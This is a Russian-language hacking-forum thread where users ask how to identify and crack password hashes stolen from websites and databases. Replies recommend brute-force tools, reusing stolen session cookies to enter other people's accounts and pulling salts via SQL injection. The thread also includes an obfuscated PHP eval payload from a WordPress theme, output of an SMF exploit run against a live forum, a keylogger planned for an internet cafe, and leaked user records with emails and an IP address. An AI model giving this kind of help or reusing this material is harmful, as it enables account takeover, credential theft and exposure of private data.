Данная тема предназначена для вопросов в данном разделе.

Создавать сторонние темы с вопросами, которые не требуют большого обсуждения будет наказание и удаление темы.

Прежде чем спросить "а что это за хеш", посмотрите на примеры в ХешГенераторе на сайте InsidePro (http://www.insidepro.com/hashes.php?lang=eng) . Так же типы хешей и алгоритмы их шифрования есть в теме Список используемых алгоритмов. Еще примеры хешей можно найти в темах по расшифровке. Если вы этого не сделаете, то есть попросите определить хеш указанный в хешгенераторе либо в упомянутых темах, то получите минус :)

Данная тема не для вопросов типа "а есть ли здесь уязвимость и как достать хеш из форума" - такие вопросы непосредственно в Уязвимости

За игнорирование этого правила будет -5 в репу.

За создание отдельной темы с вопросом о хеше будет наказание, от -10 и более в репу и удаление темы.

Доброе время суток. помогите разобратся.

изввестен пароль который некоторым заковыристым алгоритмом (комбинация мд5+солей) переводится в известных хэш.

задача найти алгоритм и потом из неизвестного хэша обратно перевести в пасс :confused: :confused: :confused:

зы зависит только от пароля. соль=const=?

Доброе время суток. помогите разобратся.

изввестен пароль который некоторым заковыристым алгоритмом (комбинация мд5+солей) переводится в известных хэш.

задача найти алгоритм и потом из неизвестного хэша обратно перевести в пасс :confused: :confused: :confused:

зы зависит только от пароля. соль=const=?

Невозможно

Хорошо...подскажите как пользоваться Хеш генератором на InsidePro???и где достать соль...доставал кукки без соли!!!

1)вписываешь пароль, нажимаешь generate- и видишь кучу сгенеренных хешей.
2)соль хранится в базе данных, вместе с хешем. В куках ее не найдешь, но можно попытаться вытащить через sql-inj

ммм...ну мне надо наоборот...расшифровать хэш(md5)...подскажите какой то сильный расшифровщик...перепробыва� � многие,не помогают(

То что они не помогают, это значит что сложный пароль.
Если хочешь сильный, то покупаешь видяху за 200 баксов на технологии CUDA и используешь специальные брутеры - будет быстрее искать пароль в несколько десятков раз.

Вопрос:
Что это за вид хэша (вытянул с базы): socSEAjCE8P0OWE/82vW3l6fhq+FP7xiKgZZmpAopng=

Внешне похож на RipeMD256(Base64)

какой софт использовать для брута , если ОСь лиукс???

Купи дедик

Неподскажите тип хэшей?
t9FFQ70VjNJDyvC
XKpHo+NdXIR+Jma
NsltZlLHjfRdDnD
uQXP0Va2YZkPTm5

похоже на DES(Unix)...

в DES(Unix) хэши 12-ти значные вроде...а тут 15-ти значный.

Help my!!! Стырил такой вот кук: [11.12.08 08:18[www.bg....com]:BG...._COM_GUEST_ID=149144;%20BGSHA_COM_LAST_VISI T=11.12.2008+11%3A16%3A39;%20PHPSESSID=c2946c1b78f 81905f46922f9d8ae5f4a

Обьясните пож, кде кук (я так понимаю c2946c1b78f81905f46922f9d8ae5f4a
) и как его расшифровать? Зарание спс!

2 hash
PHPSESSID - это идентификатор сессии, не думаю, что тебе что-то даст его расшифровка... =)

2 F4R
MySQL(64bit)

Ребята, из Microsoft Jet Database достал вот такой userpassword:
d312fa42232fd87a
не подскажите как это добро расшифровать?

Вообще, это напоминает хеш от MYSQL старый...

Вообще, это напоминает хеш от MYSQL старый...

Ну, вот в том то и дело, что бд не мускул... а Jet Database :(

вот тут проскальзывает сам хешь ..
http://translate.google.com/translate?hl=en&ie=UTF-8&u=http%3A%2F%2Fwww.amzone.cn%2Farticle.asp%3Fid%3D 22&sl=auto&tl=ru&history_state0=
гугл перевёл - MD5 пароли используются следующий ciphertext контраст - что значит я не понял ..

да... тока что это может значить :(

Подскажите, что за зверь:
7fef6171469e80d32c0559f8


Thanat0z: напиши откуда вытянул (форум, сайт, ...)

to Thanat0z: Вытянул с сайта.

ybLBhHDaQjeokdf giMznorHbvIVmcAlt что это мд5? 1 или 2?

ybLBhHDaQjeokdf giMznorHbvIVmcAlt что это мд5? 1 или 2?

похоже на Haval или Tiger192, либо просто соль для какого-то хеша

PS а что такое "мд5? 1 или 2?"

Народ, это MySQL?

4dc59b9711532418
484f173e567e8255
1dfd85b305a97217

Вот еще не понятно:

$P$BGEShcjWlD1ThVDHSU0miG5Nf.GQN60

Это md5(unix)?

$P$BGEShcjWlD1ThVDHSU0miG5Nf.GQN60

Это md5(unix)?

это хеши от Word Press

Содержимое файла htpasswd:
admin:$apr1$qkerM/..$uF6CfWBPS.0MuB3F/4S26.

Подскажите как брутить этот хэш?

Содержимое файла htpasswd:
admin:$apr1$qkerM/..$uF6CfWBPS.0MuB3F/4S26.

Подскажите как брутить этот хэш?

MD5(APR) - и бруть на здоровье :)

MD5(APR) - и бруть на здоровье :)

А где здесь соль и где сам хэш?

01b69ab0aff2f240a9f4a769695f666b08a98e15a630c9ff96 0ae9137d534a115a992f8c55181821
(пробела нет, он непрерывен)

WTF??? :eek:

похоже (http://www.insidepro.com/hashes.php?lang=rus) только на RipeMD320 :confused:

Привет Всем! Я тут сосвсем не давно поэтому прошу модераторов если не туда разместил не удаляйте пожалуйста. У меня вот какой вопрос я лазил на форуме и обучась sql-иньекции проводил взлом в результате получил в куки вот такую строку:
YTo0OntzOjI6IklEIjtzOjMyOiI2ZTAwYzdlOTU1ZGMzZWU2ZD g0ZmJjNzhjZDk1ZTBiYiI7czoyOiJhbSI7aToxO3M6NDoibGFu ZyI7czo3OiJydXNzaWFuIjtzOjM6ImxpdiI7YTo1OntpOjA7cz o0OiI3MDk5IjtpOjE7czo0OiI3MTAwIjtpOjI7czo0OiI3MTAz IjtpOjM7czo0OiI3MTAyIjtpOjQ7czo0OiI3MTA1Ijt9fQ%3D% 3D
раскодировав ее через функцию base64_decode я получил следуюущее:
a:4:{s:2:"ID";s:32:"6e00c7e955dc3ee6d84fbc78cd95e0bb";s:2:"am";i:1;s:4:"lang";s:7:"russian";s:3:"liv";a:5:{i:0;s:4:"7099";i:1;s:4:"7100";i:2;s:4:"7103";i:3;s:4:"7102";i:4;s:4:"7105";}}
Кто скажет что это такое, а больше интерисует вот это 6e00c7e955dc3ee6d84fbc78cd95e0bb. Форум VBULL.

Привет Всем! Я тут сосвсем не давно поэтому прошу модераторов если не туда разместил не удаляйте пожалуйста. У меня вот какой вопрос я лазил на форуме и обучась sql-иньекции проводил взлом в результате получил в куки вот такую строку:
YTo0OntzOjI6IklEIjtzOjMyOiI2ZTAwYzdlOTU1ZGMzZWU2ZD g0ZmJjNzhjZDk1ZTBiYiI7czoyOiJhbSI7aToxO3M6NDoibGFu ZyI7czo3OiJydXNzaWFuIjtzOjM6ImxpdiI7YTo1OntpOjA7cz o0OiI3MDk5IjtpOjE7czo0OiI3MTAwIjtpOjI7czo0OiI3MTAz IjtpOjM7czo0OiI3MTAyIjtpOjQ7czo0OiI3MTA1Ijt9fQ%3D% 3D
раскодировав ее через функцию base64_decode я получил следуюущее:
a:4:{s:2:"ID";s:32:"6e00c7e955dc3ee6d84fbc78cd95e0bb";s:2:"am";i:1;s:4:"lang";s:7:"russian";s:3:"liv";a:5:{i:0;s:4:"7099";i:1;s:4:"7100";i:2;s:4:"7103";i:3;s:4:"7102";i:4;s:4:"7105";}}
Кто скажет что это такое, а больше интерисует вот это 6e00c7e955dc3ee6d84fbc78cd95e0bb. Форум VBULL.

какая версия форума vbull?

какая версия форума vbull?
3.0.14

Народ, подскажите, что это и с чем его едят?
2115e0e87674a4066efdacda7eef809a:L1L8gLRiRZmEGgeZE nd

Например есть хеш вида

geo:8615fffc2be1f69a0e399c0f53bc9d93:vC6CioE4AQB9g g4e

md5($pass.$salt)[PHP]

Что дает эффект при переборе в PAsswordPRo!?

Я тут новичок подскажите,на одном компе нашел куки с сайта vkontakte-
там в основном какие то цифры непонятные.
Реально ли их расшифровать или это бесполезные текстовые файлы?

Я тут новичок подскажите,на одном компе нашел куки с сайта vkontakte-
там в основном какие то цифры непонятные.
Реально ли их расшифровать или это бесполезные текстовые файлы?
Логичнее будет с помощью них зайти под ака этого юзера.

$1$3FZ9TFDC$oZHESa1geXMJ.WM8EM1C7/ что за хэш, что с ним делать? (из social engine)
Это md5(unix) 100% . Они начинаются с $1$...

Например есть хеш вида

geo:8615fffc2be1f69a0e399c0f53bc9d93:vC6CioE4AQB9g g4e

md5($pass.$salt)[PHP]

Что дает эффект при переборе в PAsswordPRo!?

Не понял вопроса :confused:

Народ, подскажите, что это и с чем его едят? 2115e0e87674a4066efdacda7eef809a:L1L8gLRiRZmEGgeZE nd

откуда взял?

Народ, подскажите, что это и с чем его едят?
2115e0e87674a4066efdacda7eef809a:L1L8gLRiRZmEGgeZE nd
уверен что правильно написал?
скорей всего 2115e0e87674a4066efdacda7eef809a:L1L8gLRiRZmEGgeZ

hash: 2115e0e87674a4066efdacda7eef809a
salt: L1L8gLRiRZmEGgeZ

уверен что правильно написал?
скорей всего 2115e0e87674a4066efdacda7eef809a:L1L8gLRiRZmEGgeZ

hash: 2115e0e87674a4066efdacda7eef809a:
salt: L1L8gLRiRZmEGgeZ
лол всё он правильно написал. ":" - разделитель -_-
hash: 2115e0e87674a4066efdacda7eef809a (без : !!!)
salt: L1L8gLRiRZmEGgeZ

P.S.Из Джумлы наверное => md5($pass.$salt)

01b69ab0aff2f240a9f4a769695f666b08a98e15a630c9ff96 0ae9137d534a115a992f8c55181821
(пробела нет, он непрерывен)

WTF??? :eek:
если использовалась функция Transact-SQL,
то при алгоритме = hash(expression, ‘sha1’) получаем
A varchar 40-byte string
sha1 (Secure Hash Algorithm) is the cryptographic hash function with a 160-bit hash value.

Для "SHA1" это 40 байт, содержащие шестнадцатеричное представление 160-битного езультата хеширования расчета.
п.с вот тут (http://infocenter.sybase.com/help/index.jsp?topic=/com.sybase.infocenter.dc36271.1502/html/blocks/blocks160.htm) можно прочитать об этом

[QUOTE=Wrath]Логичнее будет с помощью них зайти под ака этого юзера.

Я думаю врядли их можно расшифровать,там написано чтото типа:
remixautobookmark
14
vkontakte.ru/
1536
1405415168
30037317
3698183968
29963892
*
__utma
201049257.1334184701723151300.1224851177.122485117 7.1224851177.1
vkontakte.ru/
1600
2806473728
30110582
3055728624
29963731

[QUOTE=Wrath]Логичнее будет с помощью них зайти под ака этого юзера.

Я думаю врядли их можно расшифровать,там написано чтото типа:
remixautobookmark
14
vkontakte.ru/
1536
1405415168
30037317
3698183968
29963892
*
__utma
201049257.1334184701723151300.1224851177.122485117 7.1224851177.1
vkontakte.ru/
1600
2806473728
30110582
3055728624
29963731


Использовать не пароль а сами куки блин

Народ, BarsWF пишет :

Failed to initialize CAL runtimem, Falling back to CPU

Где можно скачать этот "кал" и сильно ли он влияет на скорость расшифровки.

Заранее спасибо --

Это скорее всего название функции. То есть произошла ошибка в программе или при работе с оборудованием, вот оно и ругнулось

Это скорее всего название функции. То есть произошла ошибка в программе или при работе с оборудованием, вот оно и ругнулось
oO И чо теперь делать с этим?

Я в нете порылся это чо-то связанное с SQL --

Это можно скачать, но чё-то цены какие-то нереальные -- Мб у кого завалялся архивчик?

Прошу совета по подбору пароля к самораспаковывающемуся архиву WinRar (“file.exe”).
Данный самораспаковывающийся архив «file.exe» был выложен на одном интернет сайте, получить пароль к файлу можно было с помощью интернет-сервиса, отправив платное SMS (на тот момент интернет-сервис уже не работал).
Исходя из того, что использовался интернет-сервис я предположил, что пароль скорей всего не является словом (например: root или password), а представляет собой набор латинских букв, причем вероятнее не содержит спецсимволов.
Изначально я попробовал подобрать пароль путём простого перебора, используя программу «Advanced Archive Password Recovery». Указав, возможную длину пароля от 6 до 9 символов, я увидел, что подбор пароля займёт более года.
Попутно в просторах Интернета я нашёл такую информацию: "сломать архив WinRar путем брутфорса на простом компе займет не реально большое количество времени", "новые криптографические возможности WinRar и устойчивость архивов ко взлому..."
Через программу FileAlyze я попытался проанализировать этот архив. Нашел целых 5 хэшей, но какой из них является хэшем пароля для открытия файла мне не ясно (см.скриншот). Дело в том, что я скорее юзер, чем «программер» и хакер.
Вот я и решил обратиться к профессионалам. Буду рад любому совету.

ScreenShot_md5_hashes (http://uppit.com/RB4216)

P.S.
Сам файл (архив) представляет собой базу данных Билайн одного из центральных регионов, поэтому и представляет для меня интерес.

Исходя из того, что использовался интернет-сервис я предположил, что пароль скорей всего не является словом
а также содержит знаков, эдак, 15

Нашел целых 5 хэшей, но какой из них является хэшем пароля для открытия файла мне не ясно
Шутишь? Файл зашифрован (по-моему, AES), для открытия нужно брутить. А если учесть первое предположение, то, имхо, бессмысленное это дело

Что за зараза?Встретилась в скине для вордпреса
<?php $Sc14ee4c1ff836e5568b859294848d22f='jVNdb9sgFH1OpP 6HGyY1ibSErdNeOttRlq1vk6r2B0QYrm1UbCwgyTL1xw9s7LVR pe7B5nI/zj1cDptsMklmqxU8SoE5M7BaZVdT7xPyCFwxa1NiYyiuKyPLyh Gf5hOT6ku2FUc0TlqssXEJ9Z6AMEkOKgtfv2FQGSxS8oFkiaxL sIanJNm0VQu50qVsCr2YO6xbxRzuhTTInTbn+fIbbDIqa1aipU ysS1kQYMqlZPsDHu+3u58ETlK4KiWfb74SqDCwixuaJZRFAjTQ oZFP7/JMd75bqY1E+5p4Z0x6fqd2r6R1ez7meqbSKfTutCf4r0VnjfDf/dGMVup98Fzrp5qZJ4899PmD6afr/2nUAckCFjArDg13Ujd7/O1RPZg4N6yWfB8vb76E52eYXXgXN0tYwu2A/wIVGyGLoXEnDOqV0UvkDdlcSocrZMbf+FAUFNPZL//BGbDoLyabiDT47rR2OMB3yFKkpOi8JCb2mTvdnjtlvpJwyOZDh MTx5cYrY8GXYwkKuJSinw/2I/8IW6XgIeRZeECL5ohi3YOMsq6ca28pPZ1O66Nkzhyskw1fc12T zPotdwfju1h0/jrDO4GWncNqg0IvhkovzzKO7a2xXE2HWF9875/KGBk01k9sETUUSnItztGsXO3fRkid/gU=';eval(gzinflate(base64_decode($Sc14ee4c1ff836e 5568b859294848d22f))); ?>

Ребята, подскажите, в пару базах отрыл вот такого рода записи:

ãgý"É탯äÕýEÕßë@ÙÔwd¡VLM!±Ø*

или

QYR9HJOQr7GURHdG0Ub/Ng==,ObMr8YhOLIM=

Что это такое и с чем его едят?
Как сделать, что бы был читабельный вид?

Подскажите, что это за алгоритм?

/5D9a06FDf82EdMi3/XaRQ

Всем привет, в папке "cookie", нашла документ имя@list.ru, открыла его там вот такая строчка: VID
0bTyAY19NaGU
list.ru/
1024
1851628288
29929722
2234832368
29911617
*
ребят, помогите расшифровать!!!! Пожалуйста!!!!! Возможно это название почтового ящика или еще что то!!!!!

Что за зараза?Встретилась в скине для вордпреса
это zend
zend.com

на сайт передаются разные значения. не могу понять что это.
0de9faedd305e00aaf
второе значение
5bb2ef8x

прошу помочь!!!!!!!! очень нужно!!!

на сайт передаются разные значения. не могу понять что это.
0de9faedd305e00aaf
второе значение
5bb2ef8x

прошу помочь!!!!!!!! очень нужно!!!
а конкретнее?

ну передаются параметры и получается типо того reply=136245642&chas=8ffe338bac2c6f485c я так понимаю что они зашифрованы чем то

lWjhFQyaTCawD48=

очень похожи на бейс64

Угодал.

нет... смотри
пихаем его в
http://www.paulschou.com/tools/xlate/
в ответ получаем

•háљL&°Џ
а должны получить
Столинець Н М

Попробуй посмотреть
Md2(Base64) - вида L+PLniGSKBnnmieBr3TjbQ==
MD4(Base64) - вида I1gOKkWffqQPnvoUi2PK+w==
MD5(Base64) - вида gnzLDuqKcGxMNKFokfhOew==
(закодирована строка 12345)
И вообще - http://www.insidepro.com/hashes.php?lang=eng

Попробуй посмотреть
Md2(Base64) - вида L+PLniGSKBnnmieBr3TjbQ==
MD4(Base64) - вида I1gOKkWffqQPnvoUi2PK+w==
MD5(Base64) - вида gnzLDuqKcGxMNKFokfhOew==
(закодирована строка 12345)
И вообще - http://www.insidepro.com/hashes.php?lang=eng
ввожу
Столинець Н М
в ответ вижу предупреждение
Неверный текст! Используйте только символы с ASCII-кодами 32...127!

Md2(Base64) - g1Dlo+JMFT3yJ1yfgGkncw==
MD4(Base64) - MdbP4NFq6TG3PFnX4MCJwA==
MD5(Base64) - 1B2M2Y8AsgTpgAmY7PhCfg==

всё что угодно кроме
lWjhFQyaTCawD48=

ТС ты откуда вообще его взял?

мб алгоритм хеширования самописный

нашел скуль... на сайте по проверки подленности депломов...
вводиш серию номер и фио он сравнивает с записью в бд и если диплом подленный говорит что, да они выдавали такой диплом!

там 3 поля в таблици
DP_NUM:DP_SERIES:DOCKIND:PIB
первые 2 это серия и номер диплома.
а PIB фио я знал серию и нормер 1 диплома ну и фио составил запрос "lWjhFQyaTCawD48="


кодорыйбы мне выдавал PIB серию номер и фио человека которого я знаю.

таким образам получается что в таблици PIB храница "Столинець Н М" как

SVAROG да да скорее всего но файлик с проверкой дипломов я прочитать не могу!
так как и залить шел... через скуль не возможно
а в админки нет загрузки файлов или редактирования php чтобы я мог вставить шел

ребята, подскажите, что это?

b1n4ry3222b71ab89081f7080bef3c3e97e1e4495418d3
b1n4ryf3f5793ea2703c1ea6b573d10ebfec0b26b05038

Снял с сайта, магазин какой-то (:

ребята, подскажите, что это?

b1n4ry:3222b71ab89081f7080bef3c3e97e1e4495418d3
b1n4ry:f3f5793ea2703c1ea6b573d10ebfec0b26b05038

Снял с сайта, магазин какой-то (:

sha-1

Есть модуль для 1с 8.1 , там идет привязка к наименованию фирмы и ИНН (индивидуальному налоговому номеру) после покупки я отослал данные и мне прислали ключ - файл реестра , при открытии блокнотом вижу набор символов такого вида cHhsgmwwqjJDn9__rMjHv1fnepWTWpbHyAF3ZQWrGBKnFZ

Такой вопрос - можно ли узнать чем сгенерирован этот код имея исходные данные :
ИНН
Наименование фирмы
И собственно сам код

Tolyanskiy, файл случайно не .pxl?

Нет файл не pxl а обычный файл реестра.
Может это больше прояснит ситуацию: когда нет в нужной папке этого файла в 1 с выбивает сообщение не найден AstrCrypt1.dll , а этот dll файл находится в папке с модулем.

Вот нашол чем зашифровано

http://astracrypt.narod.ru/help.htm

Имея все данные вместе с сгенерированым кодом но не имея пароля можно ли его подобрать?

какой алгоритм у TB Dev SZ Edition ??? пример:

`pass` - 40b749d3cc93912ebc5075967ba481ea
`secret` - 0x565a5c6d555161565053725a7a675b746049636d

`pass` - 40b749d3cc93912ebc5075967ba481ea - MD5
`secret` - 0x565a5c6d555161565053725a7a675b746049636d - SQL-HEX

а как его теперь расшифровать?????ну мд5 понятно..... а второе нужно использовать чтобы расшифровать этот хеш? если да то как?

Всем здрасьте. не знал куда пихнуть сей вопрос, поэтому сюда пихну.
Один любимый форум я ломал, где в качестве хеша используется md5 hmac (старый двиг smf 1.0.4)
получил хеши я несколько солей на русской раскладке, и одни на западной.

для проверки совместимости алгоритмов создал на этом форуме своего юзера с паролем и логином (это соль) из латинских символов, извлек хеш и провереил в PasswordsPro все совапло. когда же я создал юзера с логином на родном языке и вытащил хеш оказалось что он не совпадает с хешем созданным в PasswordsPro.
А так как у админов руссие логины, то брут делаю на PHP .... полный пэ 140000 pps. на пхп все работает правельно, хеши совпадают. вот алгоритм для пхп


function md5_hmac($data, $key) {
$key = str_pad(strlen($key) <= 64 ? $key : pack('H*', md5($key)), 64, chr(0x00));
return md5(($key ^ str_repeat(chr(0x5c), 64)) . pack('H*', md5(($key ^ str_repeat(chr(0x36), 64)). $data)));
}


в общем проблема такова - в PasswordsPro алгоритм md5(hmac) неадекватно воспринимает соль на русском языке. (хотя мб это пхп неадекватен)

я думал проблема с кодировками, переводил в разные - нифига(((

оч прошу помочь мне! заранее спасибо. :rolleyes:

Ищу какую то прогу для перебора хешей с использованием CUDA,
К сожалению не густо. Но вот наткнулся на проект CUDA the Ripper _http://ws3.re.mipt.ru/mediawiki/index.php/CUDA_the_Ripper
Но толком ни чего ни где не сказано. Может кто то знает подробности? Заранее благодарен! :)

2tmp
http://forum.antichat.ru/threadnav37651-3-10-cuda.html

2 Parserian
Да,
BarsWF и udc.com - довольно не плохие я смотрю. ТОлько я забыл уточнить что нужна поддержка MySQL :) Но все равно - СПАСИБО ;)

Получил на сниф это (Torrent Tracker v2.0.)
QUERY: 51PHPSESSID=a2ea247b4e1945c535ad91e9bb51748d; boom_pop=1; MG_3357=7; u91281; pass=914130dae2084e29381081f7dfcc5a50

Подскажите какой это тип хэша? md5 вроде подходит

Mapkyc_, это md5. Но какой тип мы не знаем (md5(md5(pass)) и.т.п)...

дела в том что я зарегал себе пасс 12345 и отправил свои куки, но ниодним из мд5 не удалось разшифровать (((

Народ сорри мб уже был такой вопрос.... но что делать если я получил � B� -пасс админа хз в какой кодировке? сам офигел...не подскажете что с ним соьворить мона?

заранее спасибо.

Народ есть вопрос, заюзал смс сервис http://passcracking.ru/, отправил значит подождал, теперь пишет:
pass = [ Cracking by core 2 ]
И как это понимать, мне еще, что-то ждать или как?

Народ есть вопрос, заюзал смс сервис http://passcracking.ru/, отправил значит подождал, теперь пишет:
pass = [ Cracking by core 2 ]
И как это понимать, мне еще, что-то ждать или как?
Крякаяется на втором ядре, канешна ждать... :D
P.S. Второе ядро это hashcracking.ru ? :cool:

есть список в виде user : pass : mail надо добитса хеша как в примере :


a13x:HfP2hde03:alex3d89@mail.ru Hash = 2d293701f1b6

ampcaiiia:Rjfdgtc656:Zaq90@list.ru Hash = 2e6e1c4c6f99

fenerbahce:Hf33v6602023:migel101@mail.ru Hash = d27e538abfe8

есть луди которие могут мне помоч по етаму траблу?

Ребята, профи, а кто-то пользуется для расшифровки хешей Zend Studio? если да.не могли бы написать как это делается?

У меня такой вопрос как можно как можно узнать хеш ICQ?

какой еще хеш ICQ? O.o

Вопрос по exploit для SMF 1.1.7 (http://www.securitylab.ru/poc/extra/366302.php)
Вот что ролучается

Use: smf.pl -c [URL SMF] [Nick Admin] [ID
Admin] [Proxy:Puerto]
Example: smf.pl -p
http://www.simplemachines.org/community/ dschwab9 179
www.carlosslim.com:3128

C:\Err0r\exploits>perl smf.pl -c http://forum.хххх.ру/ lo6ara 322


SMF Destroyer 0.1 By Xianur0 [Priv8]


[-] Sending Mail...


[+] SESSION Detected: PHPSESSID=p9r60qks24t47n776a5klsotg4; path=/

[+] sc Detected: 6b7693f9d664395f8c1d7bad6ec323ca
[x]Sent!

[-] Attacking code link recovery...

[+] New SESSION Detected: PHPSESSID=9uq84q83ngsvb1t1flnn8c53m4; path=/
[+] Testing Code: 5b1t81b4nd

И дальши вниз долго идут разные строки вида
[+] New SESSION Detected: PHPSESSID=9uq84q83ngsvb1t1flnn8c53m4; path=/
[+] Testing Code: 5b1t81b4nd


Че это мне все дает ? и в чем может пригодится PHPSESSID ?

подставляешь в браузер (куки) и входиш на ресурс с чужой сесией...

что такое [+] sc Detected: 6b7693f9d664395f8c1d7bad6ec323ca
[x]Sent! ???? у меня из куков только PHPSESSID есть, разве этого достатачно ?

У меня вопрос:
есть хэш 2264fae5f15c7e361115275ca8622807:OVNd2VdjogkG96Mt
md5($pass.$salt) Joomla
в соответствующей теме мне выложили ответ, что пасс laperuz
Закинув его в passwordpro результата не получил! Однако на insidepro сгенерировав хэш для слова laperuz и добавив соль OVNd2VdjogkG96Mt, сайт в числе прочего выдал ответ: md5($pass.$salt): 2264fae5f15c7e361115275ca8622807

Это ошибка passwdpro, или его модуля? В чем может быть причина?

Ищу генератор радужных таблиц с поддержкой технологии CUDA.

Что за хеши вида:
$P$9P5drhqGLQi0JEjIn0CkTyRuvlpAx4/
$P$9sinP/eWYgbZkeXLP9yBKI5qVM9Dow1

С Wordpress. Извиняюсь, может уже и обговаривалось, но поиском не нашел :(

geezer.code : ето?

_http://rapidshare.com/files/206970002/cuda.rar.html

Что за хеши вида:


С Wordpress. Извиняюсь, может уже и обговаривалось, но поиском не нашел :(

похож на MD5(phpBB3)

Slev7n
Он и на MD5(Unix) вроде как похож.

f0ox : угу) ток в wordpress можно интегририват phpbb3

Тогда еще вопрос - чем восстанавливается хеш? С помощью PasswordsPro можно?

f0ox : не ужели так тежело по форуму поискать?

Slev7n, чем восстанавливать хеши я нашел. Только вот в UDC, например, не знаю как поставить этот хеш на восстановление. Вот про PasswordsPro и спросил.

F0ox : в смисле UDC?

UDC - прога такая, для восстановления хешей.

замтели прога PasswordsPro работает только с одним ядром процесора. а второе игнорирует(от общего всегда 50% загружености). есть ли какието подобыне для расшифровки хешей с потдержкой двухядерных процессоров? (Intel)

[ZIP], UDS как раз может 2 проца использовать.

Подскажите плиз на воалдвц какой md5

']замтели прога PasswordsPro работает только с одним ядром процесора. а второе игнорирует(от общего всегда 50% загружености). есть ли какието подобыне для расшифровки хешей с потдержкой двухядерных процессоров? (Intel)
Такая крутая прога и без поддержки многоядерности и многопроцессорности?

приветствую.. написал кейлогер с использованием dl.. сделал exeшник с извлечением ресурсов exe загрузчика dll и саму dll в C:/system/ и запуском exe после извлечения.. все хорошо но хотел закинуть это дело в интернет кафе а там учетная запись ограниченая то есть файлы не извлекаются и при простом копировании в системные папки отказ в доступе!!

подскажите как можно обойти эту проблему? очень нужно!!

Подскажите прогу для расифровки MD5(phpbb3) кроме passwordspro последней версии...

rainbow tables md5 можно заюзать для хэшей с солью?

ну тоисть для алгоритма md5($pass.$salt) из PasswordsPro?

2resp4 нет, нельзя.
Таблицы это "список: хеш-пароль"
Если туда добавить соль, то размер становится кол-во солей * вес без соли.
Т.е. стандартная таблица md5($pass) это тоже самое что md5($pass.salt) при условии что $salt=NULL;
А теперь просто пытаемся представить rainbow tables с разными солями...


А теперь о своих баранах :(
$user = 'comli';
$pass = '123456';
$salt = '1cbws7AhrlnsylweI2KDl75lNxc=';
$passhash = 'ddf181c437b7bb355b8956b9b8e8a258';

Нужно узнать алгоритм шифрования.

6ceDZ8oBZhP - Подскажите что за тип хеша, вроде DES, но в десе 13 символов, а тут 11, мож это какой-то обновленный алгоритм?

mysql?

Вроде он, меня при расшифровке запутало то что он в UDC и под DES подходит.

есть hash md5 с солью и юзером, как воспользоваться john the ripper?Какие options должны быть?Что записать в passd.txt?

Выдернул с SMF форума хэш админа ddceb434c153ef9d0d12c1a0d965a424 из поля passwd, но в поле passwordSalt пусто
вопрос в следуюшем - если поле Salt пустое то получается, что это просто MD5? или в SMF вкачестве соли могут содержаться пробелы?

вот типа вопрос

с чем связано то что
passwordsPro не находит пароль который должен был бы бесспорно найти ?

даю ему хеш пароля от mysql версии 5 стоящей у меня на комп.е , выбираю тип хеша mysql5 , и ничего . не находит . даже маску легкую задаю , и все равно не находит

md5(unix)
а сколько символов должно быть, у мя походу перебор) там же 32?

У меня такой вопрос

PasswordsPro а сть версия под MAC OS??

У меня такой вопрос

PasswordsPro а сть версия под MAC OS??

Все разобрался сам! Поствил емулятор вынди на MacOs

Здравствуйте)
такой вопрос:
нужно расшифровать пароль md5, пароль сложный (и цифры и буквы)
это только брутом можно сделать?
онлайн расшифровщики не знают)..Not Found

[1]:*AD4B23E06DAC7D62A0786BAC66EC876A53E24443:root
[2]:248bfe963fe80077:24x7

подскажите плз тип хэша в первый раз такое вижу

BeerDrinker, *AD4B23E06DAC7D62A0786BAC66EC876A53E24443 - это mysql5
а этот 248bfe963fe80077 на mysql похож

форум на mybb2.ru как узнать ник админа если его очень давно не было и постов с его ником нет?

cat /etc/shadow:

root:$6$ZCTfuBSjs8CQcclk$pTP76GV8wMrimf.RYqdO09hEy GitMWq6lSezPTkvGXRhEv7Ag4rt0qeNtOU5AK00wKSQBO/uPZRMJe0X015XX0:14336:0:99999:7:::
Где здесь хэш? Весь длинный? И чем его ломать? какой тип в Ppro выбирать?

Кто-нибудь в курсе что за алгоритм?
$P$B8BiEd8j0v0T7IMdLdaUmCPLhXm6Gf/
$P$BNl.tRisjDRNmewK9EyKRMBlS8lFmU/

очень похожи на те что выше budden выложил, но мои точно не из /etc/shadow

читал форум не нащёл,
как узнать пороль от Джумлы, ну вплане есть сервисы по расшифровки именно поролей от Джумлы? или брутеры.
Вот например, jcdisciple:d824a215f992199a98af5d0b6f8d94ad

2 Lutherion

это хеширование применяется в Wordpress, программ для расшировки я не видел(круто было бы, если инсайдпро сделали модуль), не считая perl-скрипта(очень медленно брутит, если все-таки хочешь им воспользоваться, поищи в англоязычном разделе форума)

2 Iceangel_
Такой модуль уже написан (почти месяц назад):
http://forum.insidepro.com/viewtopic.php?p=17532#17532

Здравствуйте!
У меня есть mysql база от wiki. В базе есть таблица user.
Естественно, меня интересует user_passwd.

Насколько я знаю, wiki хранит чтото типа хеша от хеша с солью и в разных версиях формат разный (может я и ошибаюсь).
Т.е. md5(соль + md5(passwd) + еще_чтото)

Как из этого получить пароль?

Спасибо!

у меня не понятки с хешами..
например:
2209, 3, '', 0, 'fokus', 'e1d8e40a6e36e9eaa04929e10d179ba1', '2007-06-22'
как я понял, здесь fokus - это имя пользователя , а e1d8e40a6e36e9eaa04929e10d179ba1 - это MD5 хэш.
в этом базе есть и моя уч. запись. я для эксперимента взял свой хэш, и хотел проверить. в словаре добавил свой пароль - PasswordsPro Не нашел пароль. я сгенерировал пой все виды хэшов в программе PasswordsPro, Но никакой не совподал с моим хэшом ,который в этом базе находится.
Кто может сказать - в чем дела ?
P.S. по маске пробовал и по атака полным перебором - всеравно не находит !
что за алгоритм такок? дамп снят из форума. версия: vBulletin® Version 3.7.3

а соль? поищи хорошо.может там соленые.

$n@ke
Ну вот, полная строка одного юзера:
(1050, 11, '', 0, 'АнЬка86', '3bbac56152a465e5c1fd4c23cef5db0b', '2007-04-03', 'vasilisa@bk.ru', 0, '', '', '', '', '', 1, 'знающий', 0, 1175595707, 0, 1179147243, 1179213798, 1179125271, 10, 10, 5, '0', 1, 0, 1, 11541847, '01-29-1986', '1986-01-29', -1, 2, '213.219.220.254', 0, 0, '', 0, 0, 2, 0, 0, 'eKr', 0, 2, '', 0, 0, 0, 0, 0, 0, '', 0, 39, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1),
может не правильно соображаю ?
по идее, хэш тот, которых выделил жирным..
может подскажете в чем секрет ?

Сорь, промахнулся темой.

$n@ke
Ну вот, полная строка одного юзера:
